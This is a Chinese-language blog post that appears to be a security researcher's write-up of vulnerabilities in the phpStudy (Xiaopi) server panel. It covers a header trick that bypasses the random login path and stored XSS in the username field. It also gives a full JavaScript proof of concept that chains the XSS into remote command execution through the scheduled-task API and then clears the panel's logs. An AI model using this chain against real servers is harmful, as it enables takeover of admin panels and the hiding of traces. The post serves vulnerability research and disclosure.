<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>web-RCE-phpstudy-JS2RCE | thedarknessdied</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="phpstudy面板漏洞0. 漏洞环境0.1 简介​	小皮面板，是由phpStudy官方团队针对Linux服务器开发推出的一款服务器环境搭建以及管理工具。可以通过Web端方便、快速的搭建和管理服务器环境 ​">
<meta property="og:type" content="article">
<meta property="og:title" content="web-RCE-phpstudy-JS2RCE">
<meta property="og:url" content="http://example.com/2024/03/28/web-RCE-phpstudy-JS2RCE/index.html">
<meta property="og:site_name" content="thedarknessdied">
<meta property="og:description" content="phpstudy面板漏洞0. 漏洞环境0.1 简介​	小皮面板，是由phpStudy官方团队针对Linux服务器开发推出的一款服务器环境搭建以及管理工具。可以通过Web端方便、快速的搭建和管理服务器环境 ​">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/image-20240327095747376.png">
<meta property="og:image" content="http://example.com/images/image-20240326231744490.png">
<meta property="og:image" content="http://example.com/images/image-20240326231814217.png">
<meta property="og:image" content="http://example.com/images/image-20240326232112467.png">
<meta property="og:image" content="http://example.com/images/image-20240326232224877.png">
<meta property="og:image" content="http://example.com/images/image-20240327100114948.png">
<meta property="og:image" content="http://example.com/images/image-20240327100222792.png">
<meta property="og:image" content="http://example.com/images/image-20240327100635525.png">
<meta property="og:image" content="http://example.com/images/image-20240327100703603.png">
<meta property="og:image" content="http://example.com/images/image-20240327101117725.png">
<meta property="og:image" content="http://example.com/images/image-20240327111206625.png">
<meta property="og:image" content="http://example.com/images/image-20240327102551694.png">
<meta property="og:image" content="http://example.com/images/image-20240327103417950.png">
<meta property="og:image" content="http://example.com/images/image-20240327104333994.png">
<meta property="og:image" content="http://example.com/images/image-20240327104315593.png">
<meta property="og:image" content="http://example.com/images/image-20240327112825816.png">
<meta property="og:image" content="http://example.com/images/image-20240327112915384.png">
<meta property="og:image" content="http://example.com/images/image-20240327113619478.png">
<meta property="og:image" content="http://example.com/images/image-20240327133956859.png">
<meta property="og:image" content="http://example.com/images/image-20240327141221151.png">
<meta property="article:published_time" content="2024-03-28T06:31:42.000Z">
<meta property="article:modified_time" content="2024-03-28T06:33:18.063Z">
<meta property="article:author" content="R0seK1llere">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/image-20240327095747376.png">
  
    <link rel="alternate" href="/atom.xml" title="thedarknessdied" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.1.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">thedarknessdied</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">R0seK1ller</a>
        </h2>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-web-RCE-phpstudy-JS2RCE" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/03/28/web-RCE-phpstudy-JS2RCE/" class="article-date">
  <time class="dt-published" datetime="2024-03-28T06:31:42.000Z" itemprop="datePublished">2024-03-28</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      web-RCE-phpstudy-JS2RCE
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1><span id="phpstudy面板漏洞">phpstudy面板漏洞</span></h1><h2><span id="0-漏洞环境">0. 漏洞环境</span></h2><h3><span id="01-简介">0.1 简介</span></h3><p>​	小皮面板，是由phpStudy官方团队针对Linux服务器开发推出的一款服务器环境搭建以及管理工具。可以通过Web端方便、快速的搭建和管理服务器环境</p>
<p>​	<span id="more"></span></p>
<h3><span id="02-环境搭建">0.2 环境搭建</span></h3><p>​	现在官网下载的版本已经加入了xss恶意输入过滤，需要通过其他方式下载以前的版本</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="http://x.downyagt.com:7658/down2/xpmbazcx_v0.102_downyi.com.zip">http://x.downyagt.com:7658/down2/xpmbazcx_v0.102_downyi.com.zip</a></p>
</blockquote>
<p><img src="/images/image-20240327095747376.png" alt="image-20240327095747376"></p>
<h2><span id="1-漏洞复现">1. 漏洞复现</span></h2><h3><span id="11-登陆地址随机码绕过">1.1 登陆地址随机码绕过</span></h3><p>​	小皮面板后台默认开放在 9080 端口，后台登录 url 地址中会存在一个随机码，不添加随机码时返回信息为 404</p>
<p><img src="/images/image-20240326231744490.png" alt="image-20240326231744490"></p>
<p>​	在源码分析中可以看到，登录接口对请求方式进行了校验，会屏蔽非AJAX、无验证信息、非文件操作等，所以这里我们可以采用伪装请求头的方法绕过防护，可以尝试添加请求头 <code>X-Requested-With: XMLHttpRequest</code>， 这样就可以绕过随机码</p>
<p><img src="/images/image-20240326231814217.png" alt="image-20240326231814217"></p>
<h3><span id="12-存储型xss">1.2 存储型XSS</span></h3><p>​	我们尝试在登录窗口处插入JS代码</p>
<blockquote>
<p>&lt;script&gt;alert(“username”)&lt;&#x2F;script&gt;</p>
<p>&lt;script&gt;alert(“password”)&lt;&#x2F;script&gt;</p>
</blockquote>
<p><img src="/images/image-20240326232112467.png" alt="image-20240326232112467"></p>
<p>​	点击登录返回<code>登陆失败，用户名或密码不正确</code>，</p>
<p><img src="/images/image-20240326232224877.png" alt="image-20240326232224877"></p>
<p>​	然后当我们用正确的账号密码登录小皮面板后，发现成功弹窗</p>
<p><img src="/images/image-20240327100114948.png" alt="image-20240327100114948"></p>
<p>​	观察前端代码返现在登录处的<code>username</code>用户名输入处存在存储型XSS漏洞 </p>
<p><img src="/images/image-20240327100222792.png" alt="image-20240327100222792"></p>
<h3><span id="13-rce命令执行漏洞">1.3 RCE命令执行漏洞</span></h3><p>​	在面板后台处存在计划任务模块，这里我们做个测试，尝试写入一个计划任务，将于<code>每天10时4分</code>执行<code>echo 1 &gt;&gt; ...</code>将1写入某个文件</p>
<p><img src="/images/image-20240327100635525.png" alt="image-20240327100635525"></p>
<p>​	等待时间的到来，发现成功在文件中写入1</p>
<p><img src="/images/image-20240327100703603.png" alt="image-20240327100703603"></p>
<p>​	抓包查看构建这类计划任务所需要的参数：</p>
<p><img src="/images/image-20240327101117725.png" alt="image-20240327101117725"></p>
<p>​	继续观察执行命令数据包所需要的参数：</p>
<p><img src="/images/image-20240327111206625.png" alt="image-20240327111206625"></p>
<p>​	但是在创建数据包的返回包中我们并没有看见id相关字段，这样我们该怎么控制程序执行我们的日常任务而不是等待时间的到来。</p>
<p>​	所以程序也为我们提供了一个接口 <code>/service/app/tasks.php?type=task_list</code> 能够查看所有计划任务相关的数据</p>
<p><img src="/images/image-20240327102551694.png" alt="image-20240327102551694"></p>
<p>​	那么就可以根据上面分析的编写POC</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">task</span>(<span class="params"></span>)&#123;</span><br><span class="line">    <span class="keyword">var</span> data = <span class="keyword">new</span> <span class="title class_">Object</span>();</span><br><span class="line">    data.<span class="property">task_id</span> = <span class="string">&quot;&quot;</span>;</span><br><span class="line">    data.<span class="property">title</span>=<span class="string">&quot;test1&quot;</span>;</span><br><span class="line">    data.<span class="property">exec_cycle</span> = <span class="string">&quot;1&quot;</span>;</span><br><span class="line">    data.<span class="property">week</span> = <span class="string">&quot;1&quot;</span>;</span><br><span class="line">    data.<span class="property">day</span> = <span class="string">&quot;3&quot;</span>;</span><br><span class="line">    data.<span class="property">hour</span> = <span class="string">&quot;10&quot;</span>;</span><br><span class="line">    data.<span class="property">minute</span> = <span class="string">&quot;04&quot;</span>;</span><br><span class="line">    data.<span class="property">shell</span> = <span class="string">&quot;echo+1+%3E%3E+C%3A%5CUsers%5Crichard%5CDesktop%5Ctest.txt%3A&quot;</span>;</span><br><span class="line">    $.<span class="title function_">post</span>(<span class="string">&#x27;/service/app/tasks.php?type=save_shell&#x27;</span>, data, <span class="keyword">function</span>(<span class="params">res</span>)&#123;</span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(res);</span><br><span class="line">        <span class="title function_">poc</span>();</span><br><span class="line">    &#125;,<span class="string">&#x27;json&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">poc</span>(<span class="params"></span>)&#123;</span><br><span class="line">    $.<span class="title function_">get</span>(<span class="string">&quot;/service/app/tasks.php?type=task_list&quot;</span>, &#123;&#125;, <span class="keyword">function</span> (<span class="params">res</span>) &#123;</span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(res);</span><br><span class="line">        <span class="keyword">var</span> data = res.<span class="property">data</span>;</span><br><span class="line">        <span class="keyword">var</span> data_len = data.<span class="property">length</span>;</span><br><span class="line">        <span class="keyword">let</span> task_index = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">for</span> (<span class="keyword">var</span> index=<span class="number">0</span>;index&lt;data_len;index=index+<span class="number">1</span>)&#123;</span><br><span class="line">            <span class="keyword">var</span> obj = data[index];</span><br><span class="line">            <span class="keyword">if</span> (obj.<span class="property">name</span> === <span class="string">&quot;test1&quot;</span>)&#123;</span><br><span class="line">                task_index = index;</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        $.<span class="title function_">post</span>(<span class="string">&#x27;/service/app/tasks.php?type=exec_task&#x27;</span>, &#123;</span><br><span class="line">            <span class="string">&#x27;tid&#x27;</span>: task_index</span><br><span class="line">        &#125;, <span class="keyword">function</span>(<span class="params">res2</span>)&#123;</span><br><span class="line">            <span class="variable language_">console</span>.<span class="title function_">log</span>(res2);</span><br><span class="line">            $.<span class="title function_">post</span>(<span class="string">&#x27;/service/app/log.php?type=clearlog&#x27;</span>,&#123;</span><br><span class="line"></span><br><span class="line">            &#125;,<span class="keyword">function</span>(<span class="params">res3</span>)&#123;</span><br><span class="line">                <span class="variable language_">console</span>.<span class="title function_">log</span>(res3);</span><br><span class="line">            &#125;,<span class="string">&quot;json&quot;</span>);</span><br><span class="line">        &#125;,<span class="string">&#x27;json&#x27;</span>);</span><br><span class="line">    &#125;, <span class="string">&#x27;json&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">task</span>()</span><br></pre></td></tr></table></figure>

<p>​	在本地开启http服务用于script标签远程加载js文件:</p>
<p><img src="/images/image-20240327103417950.png" alt="image-20240327103417950"></p>
<p>​	触发poc，</p>
<p><img src="/images/image-20240327104333994.png" alt="image-20240327104333994"></p>
<p>​	发现成功创建任务并执行</p>
<p><img src="/images/image-20240327104315593.png" alt="image-20240327104315593"></p>
<h2><span id="2-源码分析">2. 源码分析</span></h2><p>​	用户登录逻辑在account.php文件中，</p>
<p><img src="/images/image-20240327112825816.png" alt="image-20240327112825816"></p>
<p>​	在检测过程中会调用Account类(该类文件在app&#x2F;model&#x2F;Account.php)的login方法</p>
<p><img src="/images/image-20240327112915384.png" alt="image-20240327112915384"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$request</span> = <span class="title function_ invoke__">json_encode</span>(<span class="keyword">array</span>(<span class="string">&#x27;command&#x27;</span>=&gt;<span class="string">&#x27;login&#x27;</span>,<span class="string">&#x27;data&#x27;</span>=&gt;<span class="keyword">array</span>(<span class="string">&#x27;username&#x27;</span>=&gt;<span class="variable">$username</span>,<span class="string">&#x27;pwd&#x27;</span>=&gt;<span class="variable">$pwd</span>)));</span><br><span class="line"><span class="variable">$res</span> = <span class="title class_">Socket</span>::<span class="title function_ invoke__">request</span>(<span class="variable">$request</span>);</span><br></pre></td></tr></table></figure>

<p>​	他会尝试发送Socket请求(请求方法文件位于app&#x2F;lib&#x2F;socket.php)，查看该方法</p>
<p><img src="/images/image-20240327113619478.png" alt="image-20240327113619478"></p>
<p>​	在这里有一段写操作</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    ...</span><br><span class="line">    <span class="title function_ invoke__">socket_write</span>(<span class="variable">$socket</span>, <span class="variable">$data</span>,<span class="title function_ invoke__">strlen</span>(<span class="variable">$data</span>);</span><br></pre></td></tr></table></figure>

<p>​	这里会将你传递进来的数据写入socket套接字中，查看登录成功后的数据包:</p>
<p><img src="/images/image-20240327133956859.png" alt="image-20240327133956859"></p>
<p>​	可以发现这里在登陆成功后回去访问log.php，可以看到他也会和 8090 开放的服务进行通信，可以猜测这个服务应该相当于数据库的功能，会开辟一段空间用于存取数据。</p>
<p><img src="/images/image-20240327141221151.png" alt="image-20240327141221151"></p>
<p>​	获取的数据会不经过过滤的直接通过 <code>xpexot</code> 函数渲染到页面上</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/03/28/web-RCE-phpstudy-JS2RCE/" data-id="clw8oi5tv001jsyvd8wj87yav" data-title="web-RCE-phpstudy-JS2RCE" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web/" rel="tag">web</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/03/28/CTF-ctfshow-misc-introduction-1/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          CTF-ctfshow-misc-introduction-1
        
      </div>
    </a>
  
  
    <a href="/2024/03/26/reverse-RCE-phpstudy-xmlrpc/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">reverse-RCE-phpstudy-xmlrpc</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Permission/" rel="tag">Permission</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Post/" rel="tag">Post</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/error/" rel="tag">error</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ipc/" rel="tag">ipc</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/" rel="tag">php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/protocol/" rel="tag">protocol</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/" rel="tag">python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/reverse/" rel="tag">reverse</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/scanner/" rel="tag">scanner</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/tools/" rel="tag">tools</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/vulnhub/" rel="tag">vulnhub</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" rel="tag">web</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/windows/" rel="tag">windows</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/Permission/" style="font-size: 10px;">Permission</a> <a href="/tags/Post/" style="font-size: 10px;">Post</a> <a href="/tags/ctf/" style="font-size: 14px;">ctf</a> <a href="/tags/error/" style="font-size: 12px;">error</a> <a href="/tags/ipc/" style="font-size: 10px;">ipc</a> <a href="/tags/php/" style="font-size: 10px;">php</a> <a href="/tags/protocol/" style="font-size: 10px;">protocol</a> <a href="/tags/pwn/" style="font-size: 12px;">pwn</a> <a href="/tags/python/" style="font-size: 12px;">python</a> <a href="/tags/reverse/" style="font-size: 10px;">reverse</a> <a href="/tags/scanner/" style="font-size: 10px;">scanner</a> <a href="/tags/tools/" style="font-size: 18px;">tools</a> <a href="/tags/vulnhub/" style="font-size: 16px;">vulnhub</a> <a href="/tags/web/" style="font-size: 20px;">web</a> <a href="/tags/windows/" style="font-size: 12px;">windows</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/05/">May 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/03/">March 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/05/16/Windows-Post-Infiltration-IPC/">Windows_Post_Infiltration_IPC</a>
          </li>
        
          <li>
            <a href="/2024/05/10/Windows-Post-Infiltration-Permission-Maintenance-lnk/">Windows_Post_Infiltration_Permission_Maintenance_lnk</a>
          </li>
        
          <li>
            <a href="/2024/03/28/vulnhub-LAMPSecurity-CTF6/">vulnhub-LAMPSecurity-CTF6</a>
          </li>
        
          <li>
            <a href="/2024/03/28/CTF-ctfshow-misc-introduction-2/">CTF-ctfshow-misc-introduction-2</a>
          </li>
        
          <li>
            <a href="/2024/03/28/CTF-ctfshow-misc-introduction-1/">CTF-ctfshow-misc-introduction-1</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 R0seK1llere<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>